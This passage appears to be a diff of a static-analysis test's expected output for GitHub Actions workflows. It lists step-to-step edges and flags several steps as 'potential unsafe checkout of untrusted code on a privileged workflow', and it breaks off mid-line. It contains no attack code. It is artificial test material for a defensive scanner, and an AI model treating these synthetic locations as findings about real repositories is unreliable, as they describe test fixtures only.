+| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | +| .github/workflows/artifactpoisoning61.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/artifactpoisoning61.yml:41:9:53:6 | Run Step: prepare | .github/workflows/artifactpoisoning61.yml:53:9:53:50 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 
| Uses Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| 
.github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | 
.github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| 
.github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | 
.github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| 
.github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | +| 
.github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | 
.github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| 
.github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | 
.github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| 
.github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 
| Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +#select +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. 
| +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a 